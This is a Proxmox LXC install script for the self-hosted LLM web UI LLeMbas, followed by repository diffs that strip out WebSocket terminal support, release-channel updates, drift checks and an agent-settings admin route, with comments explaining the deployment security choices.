#!/usr/bin/env bash
# Create a Debian LXC container on a Proxmox host and install LLeMbas in it.
#
# A **wrapper around what already works**, not a second install path. It makes a
# container, puts the dependencies in it, and runs `deploy/install.sh` inside --
# which is the same script, doing the same things, so a fix to the installer
# reaches this without anybody remembering. A parallel installer would be two
# things to keep correct and one of them would rot.
#
# Run this on the Proxmox host, as root:
#
# CTID=140 SITE_HOST=chat.example ./deploy/lxc-install.sh
#
# Everything is overridable:
#
# CTID next free id the container's id
# CT_HOSTNAME lembas hostname inside it
# CT_STORAGE local-lvm where the rootfs goes
# CT_TEMPLATE debian-12 template, matched against pveam list
# CT_DISK 12 GB
# CT_CORES 2
# CT_MEMORY 4096 MB
# CT_BRIDGE vmbr0
# CT_IP dhcp or 192.168.1.50/24
# CT_GATEWAY (unset) required when CT_IP is static
# REPO_URL this checkout's origin
# SITE_HOST lembas.local
#
# **Unprivileged, and that is not a default to change lightly.** Nothing LLeMbas
# does needs privilege: agent chats run their commands over SSH on some *other*
# machine, which is the whole isolation story. A privileged container would give
# up the host's protection to buy nothing.
set -euo pipefail
CT_HOSTNAME="${CT_HOSTNAME:-lembas}"
CT_STORAGE="${CT_STORAGE:-local-lvm}"
CT_TEMPLATE="${CT_TEMPLATE:-debian-12}"
CT_DISK="${CT_DISK:-12}"
CT_CORES="${CT_CORES:-2}"
CT_MEMORY="${CT_MEMORY:-4096}"
CT_BRIDGE="${CT_BRIDGE:-vmbr0}"
CT_IP="${CT_IP:-dhcp}"
CT_GATEWAY="${CT_GATEWAY:-}"
SITE_HOST="${SITE_HOST:-lembas.local}"
BRANCH="${LEMBAS_BRANCH:-main}"
HERE="$(dirname "$(readlink -f "$0")")"
REPO_URL="${REPO_URL:-$(git -C "$HERE" remote get-url origin 2>/dev/null || true)}"
if ! command -v pct >/dev/null; then
echo "pct not found. Run this on a Proxmox host." >&2
exit 1
fi
if [[ -z "$REPO_URL" ]]; then
echo "Could not determine REPO_URL. Set it explicitly." >&2
exit 1
fi
CTID="${CTID:-$(pvesh get /cluster/nextid)}"
# The template has to be on the host before a container can be made from it.
# Matched by prefix rather than pinned to a filename, because the point release
# in it moves and a hard-coded name would break on a host that downloaded a
# different one.
echo "== template =="
template=$(pveam list local 2>/dev/null | awk -v want="$CT_TEMPLATE" '$1 ~ want {print $1}' | head -1)
if [[ -z "$template" ]]; then
available=$(pveam available --section system | awk -v want="$CT_TEMPLATE" '$2 ~ want {print $2}' | tail -1)
if [[ -z "$available" ]]; then
echo "No template matching '$CT_TEMPLATE'. Try: pveam available --section system" >&2
exit 1
fi
echo " downloading $available"
pveam download local "$available"
template="local:vztmpl/$available"
fi
echo " $template"
echo "== container $CTID =="
if pct status "$CTID" >/dev/null 2>&1; then
echo " $CTID already exists, using it"
else
net="name=eth0,bridge=$CT_BRIDGE,ip=$CT_IP"
[[ -n "$CT_GATEWAY" ]] && net="$net,gw=$CT_GATEWAY"
pct create "$CTID" "$template" \
--hostname "$CT_HOSTNAME" \
--cores "$CT_CORES" \
--memory "$CT_MEMORY" \
--rootfs "$CT_STORAGE:$CT_DISK" \
--net0 "$net" \
--unprivileged 1 \
--features nesting=1 \
--onboot 1
echo " created"
fi
pct start "$CTID" 2>/dev/null || true
# `pct exec` returns before the container's own network is up, and the very next
# thing this does is apt-get. Waiting on DNS resolving rather than on a fixed
# sleep, because a fixed sleep is either too short on a slow host or wasted on a
# fast one.
echo "== waiting for the network =="
for _ in $(seq 1 30); do
pct exec "$CTID" -- getent hosts deb.debian.org >/dev/null 2>&1 && break
sleep 2
done
echo "== dependencies =="
pct exec "$CTID" -- bash -lc '
set -e
export DEBIAN_FRONTEND=noninteractive
apt-get update -qq
apt-get install -y -qq --no-install-recommends \
git python3 python3-venv python3-pip nginx openssl sudo ca-certificates
'
echo "== checkout =="
pct exec "$CTID" -- bash -lc "
set -e
rm -rf /tmp/lembas-src
git clone --quiet --branch '$BRANCH' '$REPO_URL' /tmp/lembas-src
"
# The same installer this repository ships, run inside. Everything it decides --
# the service user, the prefix, the unit, the vhost, the self-signed certificate
# -- it decides there, so this script has no opinions to keep in step with it.
#
# The update helper is **on by default here**, and only here. `install.sh`
# defaults it off because it cannot know what it is installing onto: on a shared
# or long-lived host, letting anybody who can administer the web interface
# deploy as root is a decision somebody should make on purpose. A container
# created by this script thirty seconds ago is not that host -- it exists to run
# LLeMbas and nothing else, whoever ran this owns the hypervisor, and an
# appliance you cannot update without a shell is an appliance nobody updates.
#
# Set INSTALL_UPDATE_HELPER=0 to opt back out.
INSTALL_UPDATE_HELPER="${INSTALL_UPDATE_HELPER:-1}"
LEMBAS_CHANNEL="${LEMBAS_CHANNEL:-stable}"
echo "== install =="
pct exec "$CTID" -- bash -lc "
set -e
SITE_HOST='$SITE_HOST' LEMBAS_BRANCH='$BRANCH' REPO_URL='$REPO_URL' \
INSTALL_UPDATE_HELPER='$INSTALL_UPDATE_HELPER' \
LEMBAS_CHANNEL='$LEMBAS_CHANNEL' \
bash /tmp/lembas-src/deploy/install.sh
"
address=$(pct exec "$CTID" -- hostname -I 2>/dev/null | awk '{print $1}')
echo
echo "LLeMbas is installed in container $CTID."
echo " address : ${address:-unknown}"
echo " site : https://$SITE_HOST (self-signed; accept the warning)"
echo
echo "Point '$SITE_HOST' at ${address:-the container} in your DNS or hosts file,"
echo "then create the first account -- it becomes the administrator."
+3 -20
View File
@@ -7,19 +7,6 @@
# install.sh generates. To use a real certificate, point ssl_certificate at it;
# nothing else here needs to change.
# The terminal panel is a WebSocket, and a proxy that does not pass an upgrade
# through breaks it with no error either side can report -- the browser sees a
# failed handshake, which carries no status and no reason. This map yields
# "upgrade" only when the client asked for one and the empty string otherwise,
# which is exactly what the streamed-reply case below needs, so one `location`
# serves both. `conf.d/*.conf` is included inside `http {}`, where `map` is
# legal; the name is prefixed because two vhosts from this template would
# otherwise collide.
map $http_upgrade $lembas_connection_upgrade {
default upgrade;
'' '';
}
server {
listen 80;
listen [::]:80;
@@ -55,13 +42,9 @@ server {
proxy_buffering off;
proxy_request_buffering off;
proxy_cache off;
# SSE is plain HTTP/1.1 chunked and needs Connection left empty; the
# terminal is a real upgrade and needs it set. The map at the top of
# this file is what lets one location do both -- a hard-coded
# `Connection ""` here, which is what was here before, works for every
# streamed reply and silently breaks every terminal.
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $lembas_connection_upgrade;
# SSE is plain HTTP/1.1 chunked, not a websocket upgrade, so the
# connection header must simply be left to keep-alive.
proxy_set_header Connection "";
# A model can think for minutes before the first token. The default
# 60s read timeout would cut long generations off mid-sentence.
+6 -177
View File
@@ -10,11 +10,6 @@ set -euo pipefail
SERVICE_USER="${SERVICE_USER:-lembas}"
PREFIX="${PREFIX:-/srv/lembas}"
BRANCH="${LEMBAS_BRANCH:-main}"
# `stable` deploys the newest release tag; `edge` deploys the branch tip. Stable
# is the default because a branch tip is not a release -- following one means
# deploying whatever was pushed five minutes ago. A host with no tags yet falls
# back to the branch and says so, rather than refusing to update at all.
CHANNEL="${LEMBAS_CHANNEL:-stable}"
APP="$PREFIX/app"
VENV="$PREFIX/venv"
@@ -29,43 +24,8 @@ git_as() { sudo -u "$SERVICE_USER" git -C "$APP" "$@"; }
before=$(git_as rev-parse HEAD)
echo "== fetching =="
# `--tags` and `--force`: without the first, the stable channel never learns
# about a release; without the second, a tag that was moved -- which happens to a
# release cut wrong -- is refused rather than updated, and the host sits on the
# old one with no sign of why.
git_as fetch --quiet --tags --force origin "$BRANCH"
# What to land on. A release tag on stable, the branch tip on edge. The tag
# pattern deliberately excludes anything with a suffix: `v1.1.0-rc1` sorts above
# `v1.1.0` under git's version sort, so accepting it would step a stable host
# onto a release candidate on the strength of a hyphen.
target="origin/$BRANCH"
if [[ "$CHANNEL" == "stable" ]]; then
# `|| true` is load-bearing under `set -euo pipefail`, and for two reasons:
# grep exits 1 when nothing matches -- which is every host until the first
# release is tagged -- and `head -1` closing the pipe early can hand grep a
# SIGPIPE. Either kills the script mid-update, after the fetch and before the
# reset, leaving the checkout fetched and unmoved with no error printed.
newest=$(git_as tag --list --sort=-v:refname \
| grep -E '^v?[0-9]+\.[0-9]+\.[0-9]+$' | head -1 || true)
if [[ -n "$newest" ]]; then
target="$newest"
else
echo " no release tags yet; following $BRANCH instead"
fi
fi
echo " channel $CHANNEL -> $target"
if [[ "$target" == "origin/$BRANCH" ]]; then
# Stays on the branch, which is what this always did.
git_as reset --hard --quiet "$target"
else
# Detached at the tag. A `reset --hard <tag>` while on `main` would move the
# local branch to it, which is a rewrite of a ref nobody asked to rewrite --
# and the deployment checkout is never developed in, so being at a commit
# rather than on a branch is the more honest state anyway.
git_as -c advice.detachedHead=false checkout --force --detach --quiet "$target"
fi
git_as fetch --quiet origin "$BRANCH"
git_as reset --hard --quiet "origin/$BRANCH"
after=$(git_as rev-parse HEAD)
@@ -77,142 +37,11 @@ else
fi
# Cheap and idempotent; catches a dependency added since the last deploy.
# The extras a deployment gets. `search` because DuckDuckGo is the default web
# search provider and is meant to need no setup; `ssh` because agent chats reach
# their machine over it and a deployment without it offers the feature with an
# install hint instead. Listed here AND in install.sh -- an extra added to only
# one of them means existing deployments silently miss it.
LEMBAS_EXTRAS="${LEMBAS_EXTRAS:-search,ssh}"
# The `search` extra is included because DuckDuckGo is the default web search
# provider and is meant to need no setup -- a deployment without it offers a
# provider that fails on every call.
echo "== dependencies =="
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet -e "$APP[$LEMBAS_EXTRAS]"
# The unit is NOT reinstalled automatically. An installed unit usually carries
# host-specific lines the template cannot know about -- an ordering dependency
# on whatever serves the models, a note about how the prefix is mounted -- and
# overwriting those on every update would be a worse surprise than drifting.
#
# So this compares the *template* against the one last applied here, not the
# template against the installed file. Comparing the files would warn forever
# about the local lines, and a warning that always fires is one nobody reads.
#
# The drift is worth catching: a change in the unit can be what makes a release
# work at all, and a host that pulled the code without it would run the new
# version under the old settings and fail confusingly.
# This script itself, first, because root is running a copy of it.
#
# `install.sh` puts a root-owned copy outside the checkout and points the unit
# there -- root must not execute a file the unprivileged service account can
# write, nor one that an update just fetched. The cost of that is exactly this:
# the copy can fall behind what the checkout ships, silently, and the way to
# notice is to compare.
#
# `$0` is the copy being run; `$APP/deploy/update.sh` is what was just pulled.
self=$(readlink -f "$0")
if [[ "$self" == "$(readlink -f "$APP")"/* ]]; then
# The old wiring, and the one that matters: the unit points *into the
# checkout*, so root is executing a file the unprivileged service account
# owns and that every update overwrites. Fires on exactly the hosts installed
# before this was fixed, and never afterwards.
echo "== update helper: INSECURE WIRING ==" >&2
echo " This unit runs $self as root, and that file is owned by" >&2
echo " $SERVICE_USER -- the account the web application runs as. Anything" >&2
echo " able to write as that account can rewrite it and be root, and so" >&2
echo " can whoever controls the branch this host follows." >&2
echo " Fix by re-running the installer, which moves root's copy out:" >&2
echo " cd $APP && sudo INSTALL_UPDATE_HELPER=1 ./deploy/install.sh" >&2
elif [[ -f "$APP/deploy/update.sh" ]]; then
running_helper=$(sha256sum "$self" | cut -d' ' -f1)
shipped_helper=$(sha256sum "$APP/deploy/update.sh" | cut -d' ' -f1)
if [[ "$running_helper" != "$shipped_helper" ]]; then
echo "== update helper ==" >&2
echo " deploy/update.sh has changed since this host's copy was installed." >&2
echo " Re-run the installer to take it:" >&2
echo " cd $APP && sudo INSTALL_UPDATE_HELPER=1 ./deploy/install.sh" >&2
fi
fi
STAMP="$PREFIX/.unit-applied"
current=$(sha256sum "$APP/deploy/lembas.service" | cut -d' ' -f1)
if [[ -f "$STAMP" && "$(cat "$STAMP")" != "$current" ]]; then
echo "== systemd unit ==" >&2
echo " deploy/lembas.service has changed since it was last applied here." >&2
echo " Review it and merge by hand, keeping this host's own lines:" >&2
echo " diff /etc/systemd/system/lembas.service <(sed \\" >&2
echo " -e 's|__PREFIX__|$PREFIX|g' -e 's|__SERVICE_USER__|$SERVICE_USER|g' \\" >&2
echo " $APP/deploy/lembas.service)" >&2
echo " Then: sudo systemctl daemon-reload && sudo systemctl restart lembas" >&2
echo " And record it as applied: echo $current | sudo tee $STAMP" >&2
elif [[ ! -f "$STAMP" ]]; then
# First run after this check was added. Assume what is installed is current;
# there is nothing to compare against and crying wolf on every host once is
# not worth it.
echo "$current" | sudo tee "$STAMP" >/dev/null
fi
# The same argument for the vhost, and the failure is worse. A stale unit at
# least says something in the journal; a stale vhost breaks a feature two layers
# away, and the only symptom is a panel that says it could not connect. The
# terminal is a WebSocket, and a `location` that does not pass an upgrade
# through fails every handshake while every test in the suite still passes.
VHOST_STAMP="$PREFIX/.vhost-applied"
vhost_now=$(sha256sum "$APP/deploy/nginx-vhost.conf" | cut -d' ' -f1)
site_host=""; app_port=""
# Written by install.sh, and absent on every deployment that predates it --
# which is the case that most needs the one-time check below, so the port is
# recovered from the environment file and the vhost found by what it proxies to.
# Guessing "your-host" instead would have skipped the check on exactly the hosts
# it was added for.
# **Parsed, never sourced.** `.deploy-env` is written by the installer with
# `sudo tee`, so the file is root-owned -- but `$PREFIX` is the service
# account's own directory, mode 755, and write permission on a directory is all
# it takes to unlink a file and put another one there. `.` would have run its
# contents as root, and this script is root-triggerable by anyone who can create
# one file in `$PREFIX/data` -- which is that same account. Two keys, two
# patterns, and anything else in the file is ignored rather than executed.
if [[ -f "$PREFIX/.deploy-env" ]]; then
site_host=$(sed -n 's/^SITE_HOST=\([A-Za-z0-9._-]\{1,253\}\)$/\1/p' \
"$PREFIX/.deploy-env" | tail -1)
app_port=$(sed -n 's/^APP_PORT=\([0-9]\{1,5\}\)$/\1/p' \
"$PREFIX/.deploy-env" | tail -1)
fi
if [[ -z "$app_port" && -f "$PREFIX/lembas.env" ]]; then
app_port=$(sed -n 's/^LEMBAS_PORT=//p' "$PREFIX/lembas.env" | tail -1)
fi
app_port="${app_port:-8080}"
installed_vhost=""
if [[ -n "$site_host" && -f "/etc/nginx/conf.d/$site_host.conf" ]]; then
installed_vhost="/etc/nginx/conf.d/$site_host.conf"
else
installed_vhost=$(grep -ls "proxy_pass http://127.0.0.1:$app_port" \
/etc/nginx/conf.d/*.conf 2>/dev/null | head -1)
fi
vhost_stale=""
if [[ -f "$VHOST_STAMP" ]]; then
[[ "$(cat "$VHOST_STAMP")" != "$vhost_now" ]] && vhost_stale="the template has changed"
elif [[ -n "$installed_vhost" ]]; then
# First run with this check, so there is no stamp to compare against. Rather
# than assume what is installed is current -- which is what the unit check
# does, and would hide exactly the change this was added for -- look for the
# one thing that must be there. Everything else is left to the stamp.
grep -q 'lembas_connection_upgrade' "$installed_vhost" \
|| vhost_stale="the installed vhost does not pass WebSocket upgrades through, so the terminal cannot connect"
fi
if [[ -n "$vhost_stale" ]]; then
echo "== nginx vhost ==" >&2
echo " $vhost_stale." >&2
echo " Review and reinstall it:" >&2
echo " diff ${installed_vhost:-/etc/nginx/conf.d/your-host.conf} <(sed \\" >&2
echo " -e 's|__SITE_HOST__|${site_host:-your-host}|g' -e 's|__APP_PORT__|$app_port|g' \\" >&2
echo " $APP/deploy/nginx-vhost.conf)" >&2
echo " Then: sudo nginx -t && sudo systemctl reload nginx" >&2
echo " And record it as applied: echo $vhost_now | sudo tee $VHOST_STAMP" >&2
elif [[ ! -f "$VHOST_STAMP" ]]; then
echo "$vhost_now" | sudo tee "$VHOST_STAMP" >/dev/null
fi
sudo -u "$SERVICE_USER" "$VENV/bin/pip" install --quiet -e "$APP[search]"
echo "== restart =="
sudo systemctl restart lembas
-57
View File
@@ -1,57 +0,0 @@
# LLeMbas, and nothing else.
#
# Deliberately no reverse proxy in here. Which one to use, where the certificate
# comes from and what else the host already serves are all decisions this file
# cannot make -- and baking one in would mean anybody who already runs Caddy or
# Traefik has to unpick it first. What this does is publish on loopback, which is
# what a proxy on the same host proxies to.
#
# **TLS is not optional in practice.** The service worker and the microphone both
# require HTTPS or localhost, so over plain http on a LAN address the app cannot
# be installed and cannot dictate. See deploy/README.md.
services:
lembas:
build: .
image: lembas:latest
restart: unless-stopped
environment:
# Generate once and keep it: rotating this signs every user out *and*
# makes stored upstream API keys unreadable, because they are encrypted
# with it. `lembas secret-key` prints one.
#
# Required with no default on purpose. A compose file with a key in it is
# a key in everybody's git history, and one that quietly generated a
# temporary one would lose every stored credential on the next restart.
LEMBAS_SECRET_KEY: ${LEMBAS_SECRET_KEY:?set LEMBAS_SECRET_KEY in .env}
LEMBAS_DATA_DIR: /data
LEMBAS_HOST: 0.0.0.0
LEMBAS_PORT: 8080
LEMBAS_LOG_LEVEL: ${LEMBAS_LOG_LEVEL:-info}
LEMBAS_ALLOW_SIGNUP: ${LEMBAS_ALLOW_SIGNUP:-true}
# 127.0.0.1 rather than 0.0.0.0: the session cookie is deliberately not
# marked `secure` so a localhost install can sign anybody in at all, which
# means a network attacker on plain http could steal a session. Publishing
# this on a LAN interface without a proxy in front is the one configuration
# that turns that from a note into a problem.
ports:
- "127.0.0.1:8080:8080"
volumes:
# The database, the uploads, the encryption at rest. A named volume rather
# than a bind mount so it survives `docker compose down` -- `down -v` is
# the command that deletes it, and that asymmetry is the point.
- lembas-data:/data
# One worker, and that is not a shortcut. The generation registry, the stop
# mechanism, the terminal sessions and the schedule ticker are all
# in-process; two of these would mean two tickers and every schedule firing
# twice. Scaling this service is not supported -- see PLAN.md's first known
# limit.
deploy:
replicas: 1
volumes:
lembas-data:
+2 -23
View File
@@ -4,11 +4,7 @@ build-backend = "hatchling.build"
[project]
name = "lembas"
# Read from lembas.__version__ rather than written here. Two copies drifted
# three minor versions apart without anything noticing, because nothing reads
# this one: the app, the service worker cache key and the page footer all read
# the module. See [tool.hatch.version] below.
dynamic = ["version"]
version = "0.3.0"
description = "LLeMbas - a Middle-earth themed web UI for OpenAI-compatible LLM endpoints"
readme = "README.md"
requires-python = ">=3.11"
@@ -53,21 +49,12 @@ dev = [
# is already a core dependency. Without this the provider is offered in the
# admin UI with an install hint rather than silently missing.
search = ["ddgs>=9.0"]
# Agent chats, which run their commands on a machine reached over SSH. Optional
# on the same terms as `search`: an instance that never turns agents on should
# not carry the dependency, and one that does gets told how to install it rather
# than finding the feature silently missing. `bcrypt` is what decrypts a
# passphrase-protected OpenSSH key -- without it, pasting one fails opaquely.
ssh = ["asyncssh[bcrypt]>=2.14"]
[project.scripts]
lembas = "lembas.cli:app"
[project.urls]
Homepage = "https://git.houmeres.sk/Houmeres/LLeMbas"
[tool.hatch.version]
path = "src/lembas/__init__.py"
Homepage = "https://github.com/homer/LLeMbas"
[tool.hatch.build.targets.wheel]
packages = ["src/lembas"]
@@ -83,13 +70,5 @@ ignore = ["B008"] # FastAPI Depends() in defaults is idiomatic
[tool.pytest.ini_options]
testpaths = ["tests"]
# Registered so `-m "not slow"` works and an unknown-marker warning does not
# become an error later. `slow` is for the tests that stand up something real:
# a uvicorn subprocess on a port, an asyncssh server, a PTY, a git repository
# built with subprocess. They are the ones worth having and the ones worth
# being able to skip while iterating.
markers = [
"slow: stands up a real server, shell or repository",
]
asyncio_mode = "auto"
filterwarnings = ["ignore::DeprecationWarning"]
+2 -32
View File
@@ -3,12 +3,11 @@
LLeMbas has no Node toolchain and loads nothing from a CDN at runtime -- a
self-hosted tool should keep working without internet access, and should not
report every user's page view to a third party. The few libraries it does use
report every user's page view to a third party. The three libraries it does use
are fetched once, here, and committed.
Integrity is enforced with vendor.lock.json. A mismatched hash aborts rather
than overwriting, and so does a name that is not in the lock at all: that is
the whole point of pinning.
than overwriting: that is the whole point of pinning.
python scripts/fetch_vendor.py # fetch and verify against the lock
python scripts/fetch_vendor.py --update # re-pin after a version bump
@@ -45,21 +44,6 @@ PACKAGES = {
"url": "https://unpkg.com/alpinejs@3.15.12/dist/cdn.min.js",
"why": "Small client-only state: menus, theme toggle, composer autosize.",
},
"xterm.js": {
"version": "5.5.0",
"url": "https://unpkg.com/@xterm/xterm@5.5.0/lib/xterm.js",
"why": "The terminal panel. Loaded only on a chat that has an SSH connection.",
},
"xterm.css": {
"version": "5.5.0",
"url": "https://unpkg.com/@xterm/xterm@5.5.0/css/xterm.css",
"why": "Terminal layout. Its colours are overridden from tokens.css at runtime.",
},
"xterm-addon-fit.js": {
"version": "0.10.0",
"url": "https://unpkg.com/@xterm/addon-fit@0.10.0/lib/addon-fit.js",
"why": "Sizes the terminal to the panel; without it a resize is 80x24 forever.",
},
}
@@ -99,20 +83,6 @@ def main() -> int:
digest = sha256(payload)
expected = lock.get(filename, {}).get("sha256")
if lock and not expected and not args.update:
# A name added to PACKAGES but absent from the lock has nothing to
# compare against, so the mismatch branch below never fires and the
# file lands unpinned -- which is the one thing this script exists
# to prevent. Adding a library is a --update, like bumping one.
print(
f" FAIL {filename}: not in {LOCKFILE.name}\n"
f" Nothing to verify this download against. If the "
f"library was added deliberately, re-run with --update.",
file=sys.stderr,
)
failed = True
continue
if expected and digest != expected and not args.update:
print(
f" FAIL {filename}: hash mismatch\n"
-15
View File
@@ -13,20 +13,5 @@
"sha256": "71ea67185bfa8c98c39d31717c6fce5d852370fcdfd129db4543774d3145c0de",
"url": "https://unpkg.com/htmx.org@2.0.10/dist/htmx.min.js",
"version": "2.0.10"
},
"xterm-addon-fit.js": {
"sha256": "bdaefa370b1bfc42ee88d46fe6072400902a4d4b2d45cd93438dda9b23c97089",
"url": "https://unpkg.com/@xterm/addon-fit@0.10.0/lib/addon-fit.js",
"version": "0.10.0"
},
"xterm.css": {
"sha256": "ba8e6985669488981ccf40c0cefe3aba80722cb6c92de7ad628b0bd717faf2b6",
"url": "https://unpkg.com/@xterm/xterm@5.5.0/css/xterm.css",
"version": "5.5.0"
},
"xterm.js": {
"sha256": "1f991ac3b4b283ebf96e60ae23a00a52765dd3a2e46fa6fdda9f1aab032f7495",
"url": "https://unpkg.com/@xterm/xterm@5.5.0/lib/xterm.js",
"version": "5.5.0"
}
}
+1 -1
View File
@@ -1,3 +1,3 @@
"""LLeMbas - a Middle-earth themed web UI for OpenAI-compatible LLM endpoints."""
__version__ = "1.0.3"
__version__ = "0.3.0"
+2 -12
View File
@@ -55,10 +55,10 @@ async def general_page(request: Request, db: Db, user: AdminUser, saved: bool =
async def save_general(
db: Db,
user: AdminUser,
instance_name: str = Form("LLeMbas"),
allow_signup: bool = Form(False),
system_prompt: str = Form(""),
compact_threshold: int = Form(95),
max_chat_rounds: int = Form(5),
) -> Response:
"""Save instance settings.
@@ -68,6 +68,7 @@ async def save_general(
settings_store.update(
db,
{
"instance_name": instance_name.strip()[:120] or "LLeMbas",
"allow_signup": allow_signup,
"system_prompt": system_prompt.strip()[:8000],
# 0 is "never"; anything else is clamped into a band where it can
@@ -76,9 +77,6 @@ async def save_general(
"compact_threshold": (
0 if compact_threshold <= 0 else min(max(compact_threshold, 50), 99)
),
# Floor of 0, not 1: zero is how "no ceiling" is said, and the loop
# falls back to a runaway backstop rather than to this number.
"max_chat_rounds": min(max(max_chat_rounds, 0), 100),
},
)
log.info("registration %s by %s", "opened" if allow_signup else "closed", user.email)
@@ -143,19 +141,11 @@ async def update_connection(
base_url: str = Form(...),
api_key: str = Form(""),
enabled: bool = Form(False),
unload_url: str = Form(""),
unload_method: str = Form("POST"),
) -> Response:
connection = _connection(db, connection_id)
connection.name = name.strip()[:120] or connection.name
connection.base_url = base_url.strip().rstrip("/")
connection.enabled = enabled
# How to ask this endpoint to drop its model, for image generation's
# Preserve VRAM. Empty means it cannot be unloaded, which is the honest
# answer for anything not running on the machine ComfyUI is on.
connection.unload_url = unload_url.strip()[:500]
method = unload_method.strip().upper()
connection.unload_method = method if method in ("GET", "POST") else "POST"
submitted = api_key.strip()
if submitted and submitted != UNCHANGED_SENTINEL:
-201
View File
@@ -1,201 +0,0 @@
"""Whether agent chats exist here at all, and what they may spend.
An administrator's half of the feature. The other half -- which machines, whose
credentials -- belongs to whoever owns them and lives at `/agents`.
Nothing here is about isolation, because there is none to configure: commands
run on a host somebody chose, and its containment is that host's. The settings
are budgets, and the two lists that decide what a mode asks about.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Form, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import func, select
from lembas.api.deps import AdminUser, Db
from lembas.db.models import SshProfile
from lembas.services import settings_store
from lembas.services.agent import hosts, policy
from lembas.services.agent import ssh as ssh_service
from lembas.services.agent import terminal as terminal_service
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/agents", tags=["admin-agents"])
def _lines(text: str) -> list[str]:
"""One pattern per line, blanks dropped."""
return [line.strip() for line in (text or "").splitlines() if line.strip()]
@router.get("")
async def agents_page(request: Request, db: Db, user: AdminUser, saved: bool = False):
values = settings_store.agents(db)
return render(
request,
"admin/agents.html",
{
"values": values,
"allow_text": "\n".join(values.get("allow_default") or []),
"deny_text": "\n".join(values.get("deny_default") or []),
"problem": ssh_service.available(),
"profile_count": db.scalar(select(func.count()).select_from(SshProfile)) or 0,
"terminal_count": terminal_service.count(),
"modes": [(m, policy.MODE_LABELS[m], policy.MODE_HINTS[m]) for m in policy.MODES],
"loopback_modes": [
(m, hosts.MODE_LABELS[m], hosts.MODE_HINTS[m]) for m in hosts.MODES
],
# How many of this instance's connections the current position would
# stop. The number is the point of the card: "3 connections" beside
# a switch somebody is about to move is the difference between an
# informed change and a surprise.
"loopback_count": sum(
1
for p in db.scalars(select(SshProfile))
if hosts.is_loopback(p.host) or p.resolves_here
),
# A group of its own, saved by its own form. Subagents are not an
# agent-chat feature -- an ordinary chat can delegate too -- but
# this is the page somebody looks at when they want to know what a
# reply is allowed to set going on its own, and a nav entry for one
# card would be worse than the near-miss.
"subagents": settings_store.subagents(db),
"saved": saved,
},
)
@router.post("/subagents")
async def save_subagents(
db: Db,
user: AdminUser,
enabled: bool = Form(False),
max_per_reply: int = Form(4),
max_concurrent: int = Form(6),
max_rounds: int = Form(30),
wall_seconds: int = Form(600),
max_completion_tokens: int = Form(60_000),
keep_transcript: bool = Form(False),
) -> Response:
"""Its own route because it is its own settings group.
A single form writing two groups would mean one save handler deciding which
key each field belongs to, which is a mapping that goes wrong silently. Two
forms, two keys, and the browser posts only the one that was submitted.
"""
settings_store.update(
db,
{
"enabled": enabled,
# Clamped here as well as on read, for the reason the agent settings
# give: a number with no bound is a way to break the instance from a
# form. Zero is kept only for the token ceiling, where it means "no
# ceiling"; everywhere else a zero would be the feature switched off
# wearing the switch's clothes.
"max_per_reply": min(max(max_per_reply, 1), 20),
"max_concurrent": min(max(max_concurrent, 1), 50),
"max_rounds": min(max(max_rounds, 1), 200),
"wall_seconds": min(max(wall_seconds, 30), 7200),
"max_completion_tokens": min(max(max_completion_tokens, 0), 5_000_000),
"keep_transcript": keep_transcript,
},
key=settings_store.SUBAGENTS,
)
log.info("subagents %s by %s", "enabled" if enabled else "disabled", user.email)
return RedirectResponse("/admin/agents?saved=1", status_code=status.HTTP_303_SEE_OTHER)
@router.post("")
async def save_agents(
db: Db,
user: AdminUser,
enabled: bool = Form(False),
loopback: str = Form("off"),
loopback_port: int = Form(0),
default_timeout: int = Form(60),
max_timeout: int = Form(600),
max_output_bytes: int = Form(64 * 1024),
max_steps: int = Form(200),
max_wall_seconds: int = Form(900),
max_total_output_bytes: int = Form(1024 * 1024),
max_completion_tokens: int = Form(200_000),
approval_timeout: int = Form(900),
allow_default: str = Form(""),
deny_default: str = Form(""),
ask_free_text: bool = Form(False),
terminal_enabled: bool = Form(False),
terminal_idle_timeout: int = Form(1800),
terminal_max_sessions: int = Form(20),
terminal_max_per_user: int = Form(3),
terminal_integration: bool = Form(False),
index_enabled: bool = Form(False),
index_chars: int = Form(2000),
instructions_enabled: bool = Form(False),
instructions_chars: int = Form(4000),
nudge_unfinished: bool = Form(False),
background_enabled: bool = Form(False),
background_on_timeout: bool = Form(False),
background_notify: bool = Form(False),
background_max_jobs: int = Form(5),
) -> Response:
settings_store.update(
db,
{
"enabled": enabled,
# Anything unrecognised means off, here as well as on read: the one
# direction safe to get wrong is refusing a connection somebody has
# to re-allow, and the other is a shell on this host.
"loopback": loopback if loopback in hosts.MODES else hosts.MODE_OFF,
# Zero means "none named", which is what `port` needs in order to
# refuse rather than to allow. 22 is refused wherever it is stored.
"loopback_port": loopback_port if 1 <= loopback_port <= 65535 else 0,
# Clamped here as well as on read. A number with no bound is a way
# to break the instance from a form, which is the same reasoning
# the search settings carry.
"default_timeout": min(max(default_timeout, 1), 3600),
"max_timeout": min(max(max_timeout, 1), 3600),
"max_output_bytes": min(max(max_output_bytes, 1024), 1024 * 1024),
"max_steps": min(max(max_steps, 1), 1000),
"max_wall_seconds": min(max(max_wall_seconds, 30), 7200),
"max_total_output_bytes": min(max(max_total_output_bytes, 4096), 8 * 1024 * 1024),
# Floor of 0, not 1: zero is how "no ceiling" is said.
"max_completion_tokens": min(max(max_completion_tokens, 0), 5_000_000),
"approval_timeout": min(max(approval_timeout, 60), 3600),
"allow_default": _lines(allow_default),
"deny_default": _lines(deny_default),
"ask_free_text": ask_free_text,
"terminal_enabled": terminal_enabled,
"terminal_idle_timeout": min(max(terminal_idle_timeout, 60), 86400),
"terminal_max_sessions": min(max(terminal_max_sessions, 1), 500),
"terminal_max_per_user": min(max(terminal_max_per_user, 1), 50),
"terminal_integration": terminal_integration,
"index_enabled": index_enabled,
# Zero is kept rather than clamped up: it means "list the
# directory for the file picker but put none of it in the
# prompt", which nothing else can say.
"index_chars": min(max(index_chars, 0), 20_000),
"instructions_enabled": instructions_enabled,
"instructions_chars": min(max(instructions_chars, 0), 20_000),
"nudge_unfinished": nudge_unfinished,
"background_enabled": background_enabled,
"background_on_timeout": background_on_timeout,
"background_notify": background_notify,
"background_max_jobs": min(max(background_max_jobs, 1), 100),
},
key=settings_store.AGENTS,
)
